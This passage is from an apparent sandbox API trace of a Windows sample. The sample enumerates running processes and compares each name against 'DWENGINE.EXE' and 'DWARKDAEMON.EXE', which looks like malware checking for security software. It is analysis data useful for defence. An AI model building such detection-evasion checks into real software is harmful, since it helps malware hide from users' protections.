[0163.470] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.470] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0163.470] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.470] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.470] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.470] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.471] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.471] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.471] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.471] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.471] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.472] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.472] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.472] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.472] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.472] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.472] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.472] lstrlenW (lpString="isolation.exe") returned 13 [0163.472] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.472] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.472] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.473] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.473] lstrlenW (lpString="abc.exe") returned 7 [0163.473] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.473] lstrcmpW (lpString1="ABC.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.473] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.474] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.474] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.474] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.474] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.474] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.475] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.475] lstrlenW (lpString="english_performing.exe") returned 22 [0163.475] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.475] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.475] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.475] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.475] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.475] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.475] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.475] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.476] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.476] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.476] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.476] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.476] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.477] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.477] lstrlenW (lpString="volume.exe") returned 10 [0163.477] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.477] lstrcmpW (lpString1="VOLUME.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.477] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0163.478] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.478] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.478] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.478] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.478] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.478] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.478] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0163.478] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.478] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.478] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.479] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.479] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.479] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.479] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.479] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.480] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.480] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.480] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.480] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.480] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.480] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.481] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.481] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.481] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.481] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.481] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.481] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.481] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.481] lstrcmpW (lpString1="EXCEL.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.481] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.482] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.482] lstrlenW (lpString="svchost.exe") returned 11 [0163.482] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.482] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.482] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.483] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.483] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.483] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.483] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.483] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.483] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.483] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.483] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.483] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.483] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.486] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.486] lstrlenW (lpString="svchost.exe") returned 11 [0163.486] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.486] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.486] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.487] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.487] lstrlenW (lpString="svchost.exe") returned 11 [0163.487] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.487] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.487] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.488] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.488] lstrlenW (lpString="winpoint.exe") returned 12 [0163.488] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.488] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.488] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.488] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.488] lstrlenW (lpString="cmd.exe") returned 7 [0163.488] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.488] lstrcmpW (lpString1="CMD.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.488] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.489] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.489] lstrlenW (lpString="conhost.exe") returned 11 [0163.489] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.489] lstrcmpW (lpString1="CONHOST.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.489] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.490] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.490] lstrlenW (lpString="PING.EXE") returned 8 [0163.490] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.490] lstrcmpW (lpString1="PING.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.490] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.490] CloseHandle (hObject=0xe0) returned 1 [0163.490] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0163.492] lstrcpyW (in: lpString1=0x18f8e4, lpString2="DWARKDAEMON.EXE" | out: lpString1="DWARKDAEMON.EXE") returned="DWARKDAEMON.EXE" [0163.492] lstrlenW (lpString="DWARKDAEMON.EXE") returned 15 [0163.492] CharUpperBuffW (in: lpsz="DWARKDAEMON.EXE", cchLength=0xf | out: lpsz="DWARKDAEMON.EXE") returned 0xf [0163.492] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.493] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0163.493] lstrlenW (lpString="[System Process]") returned 16 [0163.493] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0163.493] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="DWARKDAEMON.EXE") returned -1 [0163.493] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.493] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0163.494] lstrlenW (lpString="System") returned 6 [0163.494] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0163.494] lstrcmpW (lpString1="SYSTEM", lpString2="DWARKDAEMON.EXE") returned 1 [0163.494] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.494] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.494] lstrlenW (lpString="smss.exe") returned 8 [0163.494] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0163.494] lstrcmpW (lpString1="SMSS.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.494] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.495] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.495] lstrlenW (lpString="csrss.exe") returned 9 [0163.495] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.495] lstrcmpW (lpString1="CSRSS.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.495] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.496] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.496] lstrlenW (lpString="wininit.exe") returned 11 [0163.496] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0163.496] lstrcmpW (lpString1="WININIT.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.496] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.496] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.496] lstrlenW (lpString="csrss.exe") returned 9 [0163.496] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.496] lstrcmpW (lpString1="CSRSS.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.496] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.497] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.497] lstrlenW (lpString="winlogon.exe") returned 12 [0163.497] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0163.497] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.497] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.498] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.498] lstrlenW (lpString="services.exe") returned 12 [0163.498] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0163.498] lstrcmpW (lpString1="SERVICES.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.498] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.498] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.498] lstrlenW (lpString="lsass.exe") returned 9 [0163.498] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0163.498] lstrcmpW (lpString1="LSASS.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.498] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.499] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0163.499] lstrlenW (lpString="lsm.exe") returned 7 [0163.501] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0163.501] lstrcmpW (lpString1="LSM.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.501] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.502] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.502] lstrlenW (lpString="svchost.exe") returned 11 